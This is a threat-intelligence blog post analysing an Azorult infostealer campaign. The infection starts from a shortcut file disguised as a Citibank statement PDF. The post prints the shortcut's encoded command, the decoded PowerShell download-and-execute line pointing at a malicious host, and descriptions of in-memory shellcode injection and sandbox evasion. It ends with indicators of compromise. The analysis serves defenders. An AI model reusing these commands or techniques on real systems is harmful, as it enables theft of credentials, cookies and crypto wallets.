Key Takeaways
- Azorult malware, identified in 2016, functions as an information-stealing threat.
- It is designed to gather diverse data, including browsing history, cookies, login credentials, and cryptocurrency details.
- We have come across multiple lnk samples that are distributing Azorult, suggesting an ongoing campaign aimed at targeting unsuspecting users.
- In the latest campaign, the Azorult begins with a zip file containing a malicious shortcut file posing as a PDF document.
- The shortcut file includes an obfuscated PowerShell script and commands to drop and execute a batch file using the task scheduler.
- Further stages involve downloading an additional loader from a remote server, injecting shellcode, and executing the loader.
- The final step triggers another PowerShell script leading to the execution of the Azorult malware.
- The entire process of downloading and running the loader, as well as the subsequent execution of the final payload, occurs within the memory to avoid detection.
Overview
First identified in 2016, Azorult malware operates as an information-stealing threat, collecting data such as browsing history, cookies, login credentials, and cryptocurrency details. Additionally, it can function as a downloader for other malware families. This malicious software was offered for sale on Russian underground forums and was specifically crafted to extract a variety of sensitive information from compromised computers.
Cyble Research & Intelligence Labs (CRIL) recently came across several shortcut files posing as PDF files on VirusTotal. While the initial infection vector was not present at the time of identification, phishing emails are common delivery methods in similar attacks. Our attention was piqued as the final payload turned out to be a loader that loaded Azorult into memory. Subsequently, we conducted a more in-depth analysis of the malware.
The Azorult campaign follows a multistage infection chain initiated by a zip file containing a malicious shortcut (lnk) file disguised as a PDF document. Within the shortcut file lies an obfuscated PowerShell script, along with commands to drop a batch file in the system and execute it through the task scheduler. The PowerShell script then proceeds to download an additional loader from a remote server, and injects a hardcoded shellcode which subsequently executes the loader. Ultimately, the loader file triggers another PowerShell script, leading to the execution of the final Azorult malware. Notably, all stages of the loader and final payload execution occur in memory without leaving any traces in the disk to evade detection.
Technical Details
The Figure below shows the infection chain of the Azorult.
The figure below shows the citibank_statement_dec_2023.lnk shortcut file.
The execution process is initiated by the shortcut file, which triggers commands from the %temp% folder location. The command executed by the shortcut file is as follows:
“C:WindowsSystem32cmd.exe” /c echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcgLU91dEZpbGUgJyV0ZW1wJVxmcW5JT1FkUi5qcyc7IHNjaHRhc2tzIC9kZWxldGUgL2YgL3RuIG41ZE1tSkVCWWM7IHdzY3JpcHQgJXRlbXAlXGZxbklPUWRSLmpzIg== > KgZvPA3S.bat & certutil -f -decode KgZvPA3S.bat KgZvPA3S.bat & schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc /tr “C:UsersMALWOR~1AppDataLocalTempKgZvPA3S.bat”
The command first creates a batch script file KgZvPA3S.bat into the %temp% location with Base64 encoded string. This Base64 encoded batch script is then decoded using certutil. The command then creates a schedule task n5dMmJEBYc which executes the newly created batch script KgZvPA3S.bat every minute indefinitely.
The figure below shows the task schedular entry.
The decoded batch file KgZvPA3S.bat contains the following command:
start /min powershell -command “IWR ‘hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php’ -OutFile ‘%temp%fqnIOQdR.js’; schtasks /delete /f /tn n5dMmJEBYc; wscript %temp%fqnIOQdR.js”
This command further executes a PowerShell script which downloads a file hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php and saves it as JavaScript file fqnIOQdR.js in the temp folder, The powershell script further deletes the previously created task schedule entry n5dMmJEBYc and executes newly dropped fqnIOQdR.js file using wscript.
The figure below shows the contents of the ‘fqnIOQdR.js‘ file.
The malicious script initially verifies the operating system architecture (32-bit or 64-bit) and then checks if the file is named ‘agent.js.’ If the file is not named ‘agent.js,’ the script duplicates itself into the %programdata% directory with the name ‘agent.js.’ Additionally, the script downloads and executes the following two PowerShell scripts:
- hxxps://nrgtik[.]mx/wp-content/uploads/agent1.ps1
- hxxps://nrgtik[.]mx/wp-content/uploads/agent3.ps1
The purpose of the PowerShell script, ‘agent1.ps1’, remains ambiguous. However, it is presumed that the script is crafted to dynamically identify a specific field within a type of assembly. This type of dynamic behaviour is often used by malware to hide its true intent and make analysis more challenging.
The figure below shows the PowerShell script agent1.ps1.
The second PowerShell script, ‘agent3.ps1’, functions as a loader. It retrieves an executable file from a remote server, allocates memory, injects shellcode into that allocated memory, and subsequently initiates a new thread to execute the injected code. The figure below shows agent3.ps1 PowerShell script.
The script initially downloads a loader executable, helper.exe, from a remote server. Subsequently, it employs the GDT (GetDelegateType) function to dynamically create delegate types and the GPA (GetProcAddr) function to retrieve the addresses of specific functions from the kernel32.dll module.
Using the GPA function, the script obtains the addresses of functions such as VirtualAlloc(), CreateThread(), and WaitForSingleObject() from kernel32.dll. It then utilizes GDT to create delegates for these functions based on the acquired addresses.
The script proceeds to allocate memory using VirtualAlloc(), copies shellcode into a global buffer for the downloaded executable, and creates a new thread using CreateThread(), passing the allocated memory with the shellcode and the buffer containing the downloaded executable helper.exe. Finally, it executes the helper.exe thread and waits for the thread to complete execution using WaitForSingleObject(). The script section responsible for loading and executing the shellcode is depicted in the figure below.
The loader executable “helper.exe” is a VC++ compiled file with an invalid Digital Signature signed by Microsoft. The below image shows the digital certificate details of the loader file.
Upon execution, the helper.exe does an initial check on the language code for the current user using the GetUserDefaultLangID() API and terminates itself if any of the language code matches the codes given below.
| Lang code | Language and Country |
| 419 | Russian |
| 42b | Armenian |
| 82c | Azerbaijani |
| 42c | Azerbaijani (Latin) |
| 423 | Belarusian |
| 43f | Kazakh |
| 428 | Tajik |
| 442 | Turkmen |
| 843 | Uzbek (Cyrillic) |
| 443 | Uzbek (Latin) |
| 422 | Ukrainian |
The presence of languages linked to countries in Eastern Europe and Central Asia in the code indicates a potential affiliation of the Threat Actors (TAs) in this specific geographical region.
After conducting the language check, the loader proceeds to verify if it is operating within a virtual environment. This verification involves collecting information about the display devices through the EnumDisplayDevices() API function and checking for matches with predefined strings. If a match is found with any of the hardcoded strings, such as “Hyper-V,” “VMWare,” “VBoxService.exe,” or “VBoxTray.exe,” the loader terminates its execution. The below image shows the function employed to verify the presence of a virtual environment.
After ensuring that the loader is not running in a virtual environment, it proceeds to extract the MachineGuid from the victim’s machine, specifically from the SOFTWAREMicrosoftCryptography registry. The image below shows the malware querying the registry to obtain the MachineGuid.
The acquired GUID will be utilized for communicating with command-and-control servers (C&C).
Subsequently, the loader generates a mutex named “F3B7D5F3-30F3-BAC3-F3F3-F3F3F3F3F3F3” to prevent the execution of another instance on the same machine. The following image shows the function call with the mutex name used by the loader.
Following the creation of the mutex, the loader proceeds to obtain a handle for the Microsoft Enhanced RSA and AES Cryptographic Provider, facilitating cryptographic operations that involve RSA and AES algorithms as shown in the image below.
Next, the loader proceeds to establish a scheduled task named “Firefox Default Browser Agent 458046B0AF4A39CB” utilizing the COM objects accessed via the previously fetched globally unique identifiers (GUIDs) from the victim’s machine.
This task involves the execution of the previously downloaded “agent.js” file located in the C:ProgramData folder using “wscript.exe”. The image below shows the function used to create the scheduled task.
Subsequently, the loader generates a 20-byte random number through the CryptGenRandom() API. This generated ID, combined with the MachineGUID, is utilized in the initial request to the C&C server to retrieve the configuration data. The image below shows the HTTP request from the victim’s machine to the C&C server.
Based on the configuration response received from the C&C, the loader may proceed with other malicious activities from the victim’s computer.
Following this, the loader generates another URL string to execute a next stage PowerShell Payload “sd2.ps1” from an additional remote server “hxxps://nrgtik[.]mx/wp-content/uploads”. This entire process is carried out without leaving any file on disk. The image below shows the initialization of the ShellExecute() function to retrieve and execute the PowerShell script from the remote server.
PowerShell Script sd2.ps1
This new PS script downloads configuration data from a specified URL “hxxp://45[.]90.58.1/index.php”, where $guid is used as parameters in the URL. The downloaded data is then split into an array using the pipe character (‘|’) as the delimiter. The below image shows the response from the server.
With the obtained key, the script performs an XOR (exclusive OR) operation on each byte within the encoded content found in the PowerShell script “sd2.ps1”. The below image shows the partial content of the encoded content.
After completing the decoding process, the outcome represents the final payload, which is the Azorult infostealer. The script proceeds to load the decoded assembly into the PowerShell memory using [System.Reflection.Assembly]::Load().
Azorult Payload
The ultimate payload is a 32-bit Azorult .Net executable with the capability to execute various malicious activities within the system. Initially, the malicious binary utilizes Curve25519 elliptic curve cryptography to perform the following actions: generate a random private key, clamp it for security purposes, derive the corresponding public key, and compute a shared secret by utilizing a peer’s public key. This shared secret can subsequently be employed for symmetric key encryption or other secure communication purposes. The figure below shows the code for key generation.
After that, Azorult performs several checks through a function named checkVal(), which returns a Boolean value. If any of the checks returns TRUE, the binary terminates execution. The following are the checks conducted by the binary:
- It verifies the presence of a mutex, and if found, it returns true.
- It examines whether TwoLetterISOLanguageName is not null and belongs to one of the country codes: AZ, AM, BY, KZ, KG, MD, RU, TJ, TM, UZ, and UA. If the code is null or matches one of the mentioned country codes, it returns true.
- It checks for the existence of a file named “пароли.txt” (password.txt) on the Desktop. If the file is present, it returns true.
- The binary queries video controllers in the system using “select Name from Win32_VideoController.” If the Name is “Wine Adapter,” it returns true.
- Finally, the binary checks the machine name and usernames on the victim’s system. It returns true if the machine name is not equal to “WILLCARTER-PC” and “FORTI-PC” and if the username matches one of “Joe Cage,” “STRAZNJICA.GRUBUTT,” “Paul Jones,” or “PJones.”
The figure below shows a code snippet for various checks.
Following the execution of various checks, Azorult proceeds to create a unique string for identifying the victim using the putBaseCfg() method. This method takes the buildId parameter, and the resulting string follows the format: “BASECFG |” + <MachineGuid> + ” buildId”. The buildId is supplied as a parameter during execution, while the MachineGuid is retrieved from the registry entry “SOFTWAREMicrosoftCryptography.” The routine responsible for generating this unique identifier string is illustrated in the figure below.
After generating the string using the putBaseCfg() method, malware proceeds to gather system information through the systeminfo() method, which also requires the buildId as a parameter. This function extracts various system details and compiles them into a string. The collected information is then stored in a text file named “System.text.” The following data is extracted from the system:
- UUID
- Machine Name
- Username
- Active Directory Domain name
- CPU architecture
- GPU
- RAM
- Screen Resolution
- System Language
- System Time zone
- Operating system
- Anti-Virus Product
- Installed programs
The figure below shows the code snippet of systeminfo() method.
After retrieving system information, Azorult focuses on crypto wallets. The executable includes a method called cryptowallets(), which takes the %appdata% location as a parameter. This method searches for important and sensitive wallet-related files in the system and collects all the data into a directory. The table below lists the wallets targeted by the binary:
| Ethereum | Electrum | Electrum-LTC | ElectronCash | Monero |
| Jaxx | Guarda | MyMonero | Wasabi | atomic |
| BlockstreamGreen | BitPay | Exodus | Daedalus | Ledger Live |
| Trezor | ||||
The figure below shows the routine to extract the crypto wallet-related files.
After targeting wallets, the malware then focuses on various browsers, attempting to extract important files from different data locations. The malware specifically targets Mozilla Firefox, Google Chrome, Microsoft Edge, Brave, and Opera. The figure below shows the routine to target the browser.
Azorult targets multiple applications including Authy, WinAuthy, Discord, FileZilla, OpenVPN, WinSCP, Steam, and Telegram. The figure below shows a code snippet of the malware.
Additionally, Azorult captures screenshot of the system. The figure below shows the routine to capture screenshot.
After collecting all the artifacts, Azorult sends the data to the remote server. The server URL is passed by the loader as a parameter to the Azorult binary. The data is compressed and encrypted before sending it to the server. The figure below shows the routine to encrypt the data and send it to the server.
Conclusion
Azorult is an insidious information-stealing malware, adept at extracting sensitive data and acting as a downloader for additional threats. The new infection chain is part of a complex multistage Azorult campaign, that employs obfuscated PowerShell scripts and memory-based execution to conceal its activities. The loader and payload files are never stored in the disk which makes it highly unlikely to get detected by security solutions. The campaign’s sophistication, coupled with its availability on underground forums, underscores the ongoing threat it poses to compromised systems.
Our Recommendations
- The initial infiltration for the AZORULT RAT loader typically takes place via phishing websites or emails. It is crucial to only download and install software applications from well-known and trusted sources and avoid opening emails from unknown senders.
- Users should confirm the legitimacy of websites by verifying the presence of a secure connection (https://) and ensuring the accurate spelling of domain names.
- Deploy strong antivirus and anti-malware solutions to detect and remove malicious executable files.
- Enhance the system security by creating strong, distinct passwords for each of the accounts and, whenever feasible, activate two-factor authentication.
- Regularly back up data to guarantee the ability to recover it in case of an infection and keep users informed about the most current phishing and social engineering methods employed by cybercriminals.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| Execution (TA0002) | User Execution (T1203) | User opens the malicious Shortcut file |
| Execution (TA0002) | Command and Scripting Interpreter: Windows Command Shell (T1059.003) | Azroult can execute itself using cmd.exe |
| Credential Access (TA0006) | Credentials from Password Stores: Credentials from web Browsers (T1555.003) | The user opens the malicious Shortcut file |
| Credential Access (TA0006) | Input Capture: GUI Input Capture (T1056.002) | Azroult can take screenshots |
| Discovery (TA0007) | File and Directory Discovery (T1083) | Azroult can discover Application files and directories |
| Command and Control (TA0011) | Non-Application Layer Protocol (T1095) | Azroult uses TCP for C&C communication |
| Exfiltration (TA0010) | Exfiltration Over CC&C Channel (T1041) | Exfiltration Over C&C Channel |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Details |
| a647fd01215b0a86246007f36b7832f6 b2bc65b0c792fc4ef32fc7c1d399f9f47ef15bd1 778b230b696e5ddb3a1063c939a60449f24d6f5bac91ac76e2c1e4dc24a20836 |
MD5 SHA1 SHA256 |
citibank_statement_dec_2023.zip |
| 84d45c0ce97155ca8eb16980dca11215 897309fbe2028ebb2ac40cdf83fefc72dafe8632 37a76a6009092eebcfe08efe479cdde6f8d0cf6fd9ea2ce023e0c6a43d56693a |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| 9e3d15ed4044692d6f759f188f347355 126c54696ecf7d36131a54006b3a2e524073189f fc1ff043b6ab1e1a22baa93abbfa2fefcbb796f4de67224f589dc6dcd45c02f1 |
MD5 SHA1 SHA256 |
fqnIOQdR.js |
| c798c2fa8da58fc07210969ea5136977 e11ff82d2e3db02ab4a450dcafbb38fd184c977f fd2b8640d3d05d80e769529883196fee8cc2c68d80416b7ee7b037cde5c3a877 |
MD5 SHA1 SHA256 |
KgZvPA3S.bat |
| dff2440766c462e3a2bb2b198085d171 7b6c7b2c1ead869a658c3230356beec3c95062bd ce7bd981cb416e2df589541ddbc0a3e6f3be5201a33f77e065cc79484b096a33 |
MD5 SHA1 SHA256 |
agent.js |
| f05df7c16d8c236fab6ee2b2a1997ce5 c907067a207eb47eca8bdca81c18caddee133ff5 ace2a7812874a84b32590f440f9c4d9d99567e12cb86f0ba598e5e65aa4948c0 |
MD5 SHA1 SHA256 |
agent1.ps1 |
| 274945641a4f798a13bddec960a82670 d61ef316cc5b8ec477fcfd8a2a677f53b79c6e0f 30ab6f1db490a46fb8f1643ca97194988676498baf1ae4e124352f6cc1108568 |
MD5 SHA1 SHA256 |
agent3.ps1 |
| bc0523db21c69a68ba3e7bfc4711f969 8308433cb92810bcd6f220e7b6083c778e00fe12 fd64e712eac0c7d5fdec9a1f47c1f384a67a181c13e3e98ff40ee122e9ff8347 |
MD5 SHA1 SHA256 |
helper.exe |
| b4127347d3d08d1a466289b2071e81e7 49c7bf64cf331e5269a5fce351188b9ce6167571 464a917b631b2a583025bdce274ba6f314fe30822cfa400301b924daf38e8a8c |
MD5 SHA1 SHA256 |
sd2.ps1 |
| 16eedcc3da8cc730941c9a2f4adaaf7a c62df841320132fc0196101305ad6337c4d0e31e 518d8bc5fa3f5ef09792aca8c78bed5c762e8a4e6a45f44cae974264cb5d0652 |
MD5 SHA1 SHA256 |
sd4.ps1 |
| hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php | URL | Malicious URL |
| hxxps://nrgtik[.]mx/wp-content/uploads/agent1.ps1 | URL | Malicious URL |
| hxxps://nrgtik[.]mx/wp-content/uploads/agent3.ps1 | URL | Malicious URL |
| hxxps://nrgtik[.]mx/wp-content/uploads/helper.exe | URL | Malicious URL |
| hxxps://nrgtik[.]mx/wp-content/uploads/sd2.ps1 | URL | Malicious URL |
| hxxps://nrgtik[.]mx/wp-content/uploads/sd4.ps1 | URL | Malicious URL |
| nrgtik[.]mx | Domain | Malicious Domain |
| hxxp://45.90.58[.]1/index.php?id=$guid&subid=c4gQX595 | url | C&C |
| 45.90.58[.]1 | IP | C&C |
| 27ca5b7ab4fa5053761347cda6c5c923 bba6ec0bf8fc454daa61c577d1813394dd6b6d1f 7ca5e9e3033f7913657dce0b85520ec3384ae6653235af093ac2a6e442791225 |
MD5 SHA1 SHA256 | citibank_statement_Dec_2023.lnk |
| 1d2d48cdf0805192afa82c98252ab5d3 119c6b9667e0c0c5204fc587b36f195d62c4c788 e6354942792174245b72ccfc53c1af0082ff09b239dcb138bcb79c2d9e2665c5 |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| 72ea03e510a67b4fc05aea2820c88280 52e34e60664da8634cafc1f6bae8f33332772f3e 5c324e6671cefb63bd1b2c64adf2cef42daec7cb5179e18966b7719508ed314b |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| 735ad0b79ceaa614e465e62d8f3d4455 0d31b18630252c1ce69c7d52453e77ba72f1f668 e0e8ff864814e3a9f21f13c49ae139ba4bc89f0d519fed3d3b7ee3c5053cde30 |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| 6c5d40687a6b5cacf90f43799c62e7b8 b393759a1a54dcd2aa1f60249e129a4f5f8c84ef 1a8cfda57d60852c1604ca179f1483edbc652f9486072878e4dab4b413dda321 |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| ac64471cc8eb90b31f91a81398502e87 14aff6d9b16fa39799041c9f0741e5a2a1194888 465c34bdaee28c628b9639ca77c6a190c5fc400ba735a498d0689f1da747a341 |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| 93f91815cf0bfee78b13f4a79d683151 567c7e0144223a84a72a60a7f20996decc2feb76 b4ccb27acf65da46693be6987b890f2f19481ec1824f2c3017493245fe9ed4aa |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
| 67a69b58f31f30eafdbba927c07d4b76 e7f1d6c4239a90ef1ea6cee83a7174c2657318db 386661e445f65f30b0a68f264f1393a722ba90d3f3491ae57af7745e18cb13c8 |
MD5 SHA1 SHA256 |
citibank_statement_Dec_2023.lnk |
References
Source: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/